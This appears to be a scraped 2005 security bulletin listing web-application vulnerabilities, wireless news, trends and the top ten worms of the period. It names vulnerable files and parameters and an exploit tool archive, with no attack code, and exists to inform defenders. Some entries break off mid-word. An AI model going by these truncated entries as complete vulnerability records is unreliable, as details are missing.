PHP Handicapper | Multiple vulnerabilities have been reported: a Cross-Site Scripting vulnerability was reported in 'process_signup. No workaround or patch available at time of publishing. There is no exploit code required. | PHP Handicapper Cross-Site Scripting & SQL Injection | Medium | Secunia Advisory: SA17412, November 3, 2005 |
PHP 4.0.x, 4.1.x, 4.2.x, 4.3.x, 4.4.x, 5.0.x | Multiple vulnerabilities have been reported: a vulnerability was reported due to insufficient protection of the 'GLOBALS' array, which could let a remote malicious user define global variables; a vulnerability was reported in the 'parse_str()' PHP function when handling an unexpected termination, which could let a remote malicious user enable the 'register_ Upgrades available at: SUSE: Fedora: There is no exploit code required. | PHP Multiple Vulnerabilities CVE-2005-3388 | Medium | Secunia Advisory: SA17371, October 31, 2005 SUSE Security Summary Report, SUSE-SR:2005:025, November 4, 2005 Fedora Update Notifications, |
phpBB 2.0-2.0.18, 1.4.4, 1.4.0-1.4.2, 1.2.1, 1.2 .0, 1.0 .0 | A Cross-Site Scripting vulnerability has been reported in 'Usercp_sendpasswd.php' due to insufficient sanitization of user-supplied input, which could let a remote malicious user execute arbitrary HTML and script code. No workaround or patch available at time of publishing. There is no exploit code required; however, a Proof of Concept exploit has been published. | PHPBB Forum Cross-Site Scripting | Medium | Security Focus, Bugtraq ID: 15357, November 8, 2005 |
PHPFM | A file upload vulnerability has been reported, which could let a remote malicious user execute arbitrary code.
No workaround or patch available at time of publishing. There is no exploit code required; however, a Proof of Concept exploit has been published. | PHPFM Arbitrary File Upload | Medium | Security Focus, Bugtraq ID: 15335, November 7, 2005 |
PHPKIT 1.6.1 R2 & prior | Multiple vulnerabilities have been reported: a vulnerability was reported due to insufficient sanitization of unspecified input, which could let a remote malicious user execute arbitrary HTML and script code; a vulnerability was reported in 'admin/admin.php' due to insufficient sanitization of the 'site_body' parameter before returning to the user, which could let a remote malicious user execute arbitrary HTML and script code; a vulnerability was reported due to insufficient sanitization of the referer HTTP header, which could let a remote malicious user execute arbitrary HTML and script code; an SQL injection vulnerability was reported in the 'id' and 'PHPKITSID' parameters before using in an SQL query, which could let a remote malicious user execute arbitrary SQL code; a vulnerability was reported in the 'path' parameter in various scripts due to insufficient verification before used to include files, which could let a remote malicious user execute arbitrary PHP code; and a vulnerability was reported in the 'eval()' call due to insufficient sanitization, which could let a remote malicious user execute arbitrary PHP code. No workaround or patch available at time of publishing. There is no exploit code required; however, a Proof of Concept exploit has been published. | PHPKit Multiple Input Validation | High | Hardened PHP Project Security Advisory, November 7, 2005 |
PHPList Mailing List Manager 2.10.1, 2.8.12, 2.6-2.6.4 | Multiple vulnerabilities have been reported: a vulnerability was reported because users can access other users' personal details; a vulnerability was reported in the sign up process, which could let a remote malicious user obtain access without providing a password; a vulnerability was reported due to insufficient sanitization of some input in the administration interface before returning to the user, which could let a remote malicious user execute arbitrary HTML and script code; an SQL injection vulnerability was reported due to insufficient sanitization of some input in the administration interface before using in an SQL query, which could let a remote malicious user execute arbitrary SQL code; and a vulnerability was reported due to insufficient sanitization of some input passed in the administration interface before displaying, which could let a remote malicious user obtain sensitive information. Upgrades available at: There is no exploit code required; however, Proof of Concept exploits have been published. | PHPList Multiple Input Validation | Medium | Secunia Advisory: SA17476, November 8, 2005 |
PhpWebThings 0.4.4 | Several vulnerabilities have been reported: a Cross-Site Scripting vulnerability was reported in 'forum.php' due to insufficient sanitization of user-supplied input, which could let a remote malicious user execute arbitrary HTML and script code; and an SQL injection vulnerability was reported in 'Forum.PHP' due to insufficient sanitization of user-supplied input before using in an SQL query, which could let a remote malicious user execute arbitrary SQL code. No workaround or patch available at time of publishing. There is no exploit code required; however, Proof of Concept exploits have been published. | phpWebThings Cross-Site Scripting & SQL Injection | Medium | Security Focus, Bugtraq ID: 15276 & 15277, November 2, 2005 |
SAP Web Application Server 7.0, 6.40, 6.20, 6.10 | Several vulnerabilities have been reported: an HTTP response splitting vulnerability was reported due to insufficient sanitization of user-supplied input, which could lead to a false sense of trust; several Cross-Site Scripting vulnerabilities were reported due to insufficient sanitization of user-supplied input, which could let a remote malicious user execute arbitrary HTML and script code; and a URI redirection vulnerability was reported in the 'sap-exiturl' parameter, which could let a remote malicious user steal cookie-based credentials or enhance phishing style attacks.
The vendor has released solutions and patch information regarding this issue. Users are advised to contact the vendor for further information. There is no exploit code required; however, Proof of Concept exploits have been published for the Cross-Site Scripting & URI Redirection vulnerabilities. | SAP Web Application Server HTTP Response Splitting, Cross-Site Scripting & URI Redirection | Medium | Security Focus, Bugtraq ID: 15360, 15361, & 15362, November 9, 2005 |
Scorched 3D 39.1, 37.1, 37.0, 36.0-36.2, 35.0 | Multiple vulnerabilities have been reported: a buffer overflow vulnerability was reported due to boundary and format string errors in various functions, which could let a remote malicious user execute arbitrary code; a vulnerability as reported in 'ServerConnect No workaround or patch available at time of publishing. A Proof of Concept exploit has been published. | Scorched 3D Multiple Vulnerabilities | High | Secunia Advisory: SA17423, November 4, 2005 |
Movable Type 3.17, 3.16, 3.2, 2.63, 2.0 | Several vulnerabilities have been reported; a vulnerability was reported due to insufficient sanitization of user-supplied input, which could let a remote malicious user create an arbitrary blog path; and a vulnerability was reported due to insufficient sanitization of user-supplied input before using in dynamically generated content, which could let a remote malicious user execute arbitrary HTML and script code.
There is no exploit code required. Currently we are not aware of any exploits for these vulnerabilities. | Movable Type Arbitrary Blog Creation Path & Entry Posting HTML Injection | Medium | Security Focus, Bugtraq ID: 15302 & 15305, November 3, 2005 |
SquirrelMail 1.4.0-1.4.5-RC1. | A vulnerability has been reported in 'options_identities.php' because parameters are insecurely extracted, which could let a remote malicious user execute arbitrary HTML and script code, or obtain/ Upgrades available at: Debian: RedHat: Apple: Fedora: Fedora: Mandriva: There is no exploit code required. | SquirrelMail Variable Handling | Medium | GulfTech Security Research Debian Security Advisory, RedHat Security Advisory, RHSA-2005:595-12, August 3, 2005 Apple Security Update 2005-007, Fedora Update Notifications, Fedora Legacy Update Advisory, FLSA:163047, September 15, 2005 Mandriva Linux Security Advisory, MDKSA-2005:202, November 2, 2005 |
JDK (Windows Production Release) 1.5.0_05, 1.4.2_09, 1.4.2_08, JDK (Solaris Production Release) 1.5.0_05, 1.4.2_09, 1.4.2_08, JDK (Linux Production Release) 1.5.0_05, 1.4.2_09, 1.4.2_08, JDK 1.5 .0_05, 1.4.2_09, 1.4.2_08 | A remote Denial of Service vulnerability has been reported due to a font deserialization error. No workaround or patch available at time of publishing. Currently we are not aware of any exploits for this vulnerability | Sun Java Development Kit Font Serialization Remote Denial of Service | Low | Security Focus, Bugtraq ID: 15312, November 4, 2005 |
XMB Forum 1.9.3 | A Cross-Site Scripting vulnerability has been reported in 'u2u.php' due to insufficient sanitization of user-supplied input, which could let a remote malicious user execute arbitrary HTML and script code. No workaround or patch available at time of publishing. There is no exploit code required; however, a Proof of Concept exploit has been published. | XMB Cross-Site Scripting | Medium | Security Focus, Bugtraq ID: 15342, November 7, 2005 |
XMB Forum 1.9.3 | An SQL injection vulnerability has been reported in 'post.php' due to insufficient sanitization of user-supplied input before using in an SQL query, which could let a remote malicious user execute arbitrary SQL code. No workaround or patch available at time of publishing. There is no exploit code required; however, a Proof of Concept exploit has been published. | XMB Forum SQL Injection | Medium | Security Focus, Bugtraq ID: 15267, November 1, 2005 |
toendaCMS 0.6.1 | Several vulnerabilities have been reported: a Directory Traversal vulnerability was reported in 'admin.php' due to insufficient verification of the 'id_user' parameter before used to display files, which could let a remote malicious user obtain sensitive information; and a vulnerability was reported because user credentials and session information is stored inside the web root, which could let a remote malicious user obtain sensitive information. Upgrade available at: There is no exploit code required; however, a Proof of Concept exploit has been published. | toendaCMS Information Disclosure | Medium | SEC-CONSULT Security Advisory, November 7, 2005 |
NetBackup Server 5.1, 5.0, NetBackup Enterprise Server 5.1, 5.0, NetBackup Client 5.1, 5.0 | A buffer overflow vulnerability has been reported in a shared library used by the VERITAS NetBackup volume manager daemon (vmd), which could let a remote malicious user potentially execute arbitrary code or cause a Denial of Service. Patches available at: Currently we are not aware of any exploits for this vulnerability. | VERITAS NetBackup Volume Manager Daemon Buffer Overflow | High | Symantec Security Advisory, SYM05-024, November 8, 2005 |
Vubb | Several vulnerabilities have been reported: a Cross-Site Scripting vulnerability was reported in 'index.php' due to insufficient sanitization of user-supplied input, which could let a remote malicious user execute arbitrary HTML and script code; and a path disclosure vulnerability has been reported when an error message is displayed, which could let a remote malicious user obtain sensitive information. No workaround or patch available at time of publishing. There is no exploit code required; however, a Proof of Concept exploit script has been published. | VUBB Cross-Site Scripting & Path Disclosure | Medium | KAPDA Advisory :#10, November 1, 2005 |
Cerberus Helpdesk 2.6.1, 2.0-2.5 | A vulnerability has been reported in the 'attachment_ No workaround or patch available at time of publishing. There is no exploit code required. | Cerberus Helpdesk Information Disclosure | Medium | Security Tracker Alert ID: 1015153, November 4, 2005 |
YaBB 2.0, RC1 & RC2, 1.41, 1.40, YaBB 1 Gold Release, SP 1.4, SP 1.3-1.3.2, SP 1.2, SP 1 | A vulnerability has been reported in the attachment upload handling due to an input validation error, which could let a remote malicious user execute arbitrary HTML and script code. Upgrades available at: There is no exploit code required. | YaBB Image Upload HTML Injection | Medium | Secunia Advisory: SA17411, November 9, 2005 |
[back to top] Wireless
The section below contains wireless vulnerabilities, articles, and viruses/trojans identified during this reporting period.
- IDC: As mobile workforce grows, IT support could lag: According to a study by IDC, the global mobile workforce is expected to grow by more than 20% in the next four years, with 878 million mobile workers toiling away on laptops, handhelds and cell phones by 2009. However, IT managers today often don’t deal with the complexities associated with managing, securing and supporting handheld devices and applications for mobile workers. Source: http://www.computerworld.com/mobiletopics/
mobile/story/0,10801,106062,00.html. - Agencies jockey over wireless spectrum: By the end of this month, federal agencies will release to the Commerce Department plans on how they will manage their allotment of the nation’s airwaves.
Since President Bush unveiled a sweeping spectrum management memorandum last December that included 24 recommendations and key milestones, federal agencies have been scrambling to determine how much of the electromagnetic spectrum they are using and for what purposes.
Source: http://www.gcn.com/vol1_no1/daily-updates/37475-1.html. - New type of phishing could hit mobile phone users: Experts are warning that a new type of phishing that could siphon bank details from mobile phone users.
Mophophishing is where hackers send out fake banking applications to unsuspecting mobile phone users. The users then type their account details into the application thinking they were accessing their accounts when they were actually sending their personal details back to the hacker.
Spotting a phishing email is relatively straightforward, the user need only examine the source code of an HTML email and inspect the domain name and path of any link to verify its authenticity. But with a mobile application, this information is concealed deep within the application code itself.
Source: http://www.scmagazine.com/uk/news/article/525582/new-type-phishing-hit-mobile-phone-users/
Wireless Vulnerabilities
- Cisco flaw puts Wi-Fi networks at risk: This problem affects large Wi-Fi networks and occurs when Cisco 1200, 1131 and 1240 series Wi-Fi access points are controlled by Cisco 2000 and 4400 series Airespace Wireless LAN Controllers. Source: http://news.com.com/Cisco+flaw+puts+Wi-Fi+networks+at+risk/2100-7349_3-5929059.html?tag=cd.top
- ssf.zip: A VoIP Phone exploit tool.
- WifiScanner-1.0.1.tar.gz: An analyzer and detector of 802.11b stations and access points.
- phzine01.zip: Phearless Serbian/Croatian Security Magazine Issue #01.
Recent Exploit Scripts/Techniques
The table below contains a sample of exploit scripts and "how to" guides identified during this period. The "Workaround or Patch Available" column indicates if vendors, security vulnerability listservs, or Computer Emergency Response Teams (CERTs) have published workarounds or patches.
Note: At times, scripts/techniques may contain names or content that may be considered offensive.
[back to
top]
name=trends>Trends
- Spyware Has Become A "Global Pandemic" For Enterprises: Survey: A new study by Webroot Software found that 48% of enterprise PCs are infected with adware. They found that the average enterprise PC had 3.9 adware infections in the third quarter of this year, up from 3.6 in the previous quarter.
Source: http://www.networkingpipeline.com/showArticle.jhtml?articleID=173600626. - New Linux worm crawls the web: A new Linux worm is crawling the web looking for a large number of vulnerable PHP systems and applications. The worm, known as Linux.Plupii (Symantec) or Linux/Lupper.worm (McAfee. It installs a Trojan using wget and the attack allows for arbitrary code execution under the privileges of the web server user.
The worm exploits PHP based vulnerabilities discovered back in June, and affects a large number of PHP web applications that use XML-RPC. Source: http://www.securityfocus.com/brief/38. - US-CERT is currently aware of a new worm which targets web servers running vulnerable versions of XML-RPC for PHP. Once the worm infects a web server, it opens a backdoor to the compromised server and begins scanning for additional servers to infect.
- Phishing Alert: Google: Websense® Security Labs™ has received reports of a new phishing attack that targets users of Google's search engine. Users are redirected to a spoofed copy of Google's front page with a large message claiming "You WON $400.00 !!!". They are presented with instructions for collecting their prize money, which included entering credit card numbers and shipping addresses. Once the information has been collected, users are directed to Google's legitimate website.Source: http://www.websensesecuritylabs.com/alerts/alert.php?AlertID=332.
- Online ID theft worsens, scares U.S. bank customers: Banks and regulators have increased their efforts to stop identity theft over the Internet but many Americans fear that fraudsters remain one step ahead when banking online. Source: http://www.computerworld.com/securitytopics/
security/story/0,10801,106066,00.html/. - Hey Linux Users: No Software Is Impenetrable: The vulnerability that affects a Windows network today is very likely to infect a Linux or Unix network connected to it. Companies that fail to secure their Linux networks may find rogue code spreading and infecting interconnected Windows networks. Source: http://www.newsfactor.com/story.xhtml?story_id=02000000GPIG.
name=viruses id="viruses">Viruses/Trojans Top Ten Virus Threats
A list of high threat viruses, as reported to various anti-virus vendors and virus incident reporting organizations, has been ranked and categorized in the table below. For the purposes of collecting and collating data, infections involving multiple systems at a single location are considered a single infection. It is therefore possible that a virus has infected hundreds of machines but has only been counted once. With the number of viruses that appear each month, it is possible that a new virus will become widely distributed before the next edition of this publication. To limit the possibility of infection, readers are reminded to update their anti-virus packages as soon as updates become available. The table lists the viruses by ranking (number of sites affected), common virus name, type of virus code (i.e., boot, file, macro, multi-partite, script), trends (based on number of infections reported since last week), and approximate date first found.
face="Arial, Helvetica, sans-serif">Rank | Common Name | Type of Code |
face="Arial, Helvetica, sans-serif">Trend | Date |
face="Arial, Helvetica, sans-serif">Description |
1 | Netsky-P | Win32 Worm | Stable | March 2004 | A mass-mailing worm that uses its own SMTP engine to send itself to the email addresses it finds when scanning the hard drives and mapped drives. The worm also tries to spread through various file-sharing programs by copying itself into various shared folders. |
2 | Mytob-BE | Win32 Worm | Stable | June 2005 | A slight variant of the mass-mailing worm that utilizes an IRC backdoor, LSASS vulnerability, and email to propagate. Harvesting addresses from the Windows address book, disabling anti virus, and modifying data. |
3 | Netsky-D | Win32 Worm | Stable | March 2004 | A simplified variant of the Netsky mass-mailing worm in that it does not contain many of the text strings that were present in NetSky.C and it does not copy itself to shared folders. Netsky.D spreads itself in e-mails as an executable attachment only. |
4 | Mytob-GH | Win32 Worm | Stable | November 2005 | A variant of the mass-mailing worm that disables security related programs and allows other to access the infected system. This version sends itself to email addresses harvested from the system, forging the sender’s address. |
5 | Mytob-AS | Win32 Worm | Stable | June 2005 | A slight variant of the mass-mailing worm that disables security related programs and processes, redirection various sites, and changing registry values. This version downloads code from the net and utilizes its own email engine. |
6 | Netsky-Z | Win32 Worm | Stable | April 2004 | A mass-mailing worm that is very close to previous variants. The worm spreads in e-mails, but does not spread to local network and P2P and does not uninstall Bagle worm. The worm has a backdoor that listens on port 665. |
7 | Lovgate.w | Win32 Worm | Stable | April 2004 | A mass-mailing worm that propagates via by using MAPI as a reply to messages, by using an internal SMTP, by dropping copies of itself on network shares, and through peer-to-peer networks. Attempts to access all machines in the local area network. |
8 | Zafi-D | Win32 Worm | Stable | December 2004 | A mass-mailing worm that sends itself to email addresses gathered from the infected computer. The worm may also attempt to lower security settings, terminate processes, and open a back door on the compromised computer. |
9 | Zafi-B | Win32 Worm | Stable | June 2004 | A mass-mailing worm that spreads via e-mail using several different languages, including English, Hungarian and Russian. When executed, the worm makes two copies of itself in the %System% directory with randomly generated file names. |
10 | Mytob.C | Win32 Worm | Stable | March 2004 | A mass-mailing worm with IRC backdoor functionality which can also infect computers vulnerable to the Windows LSASS (MS04-011) exploit. The worm will attempt to harvest email addresses from the local hard disk by scanning files. |
Table updated November 7, 2005
Last updated
Please share your thoughts
We recently updated our anonymous product survey; we’d welcome your feedback.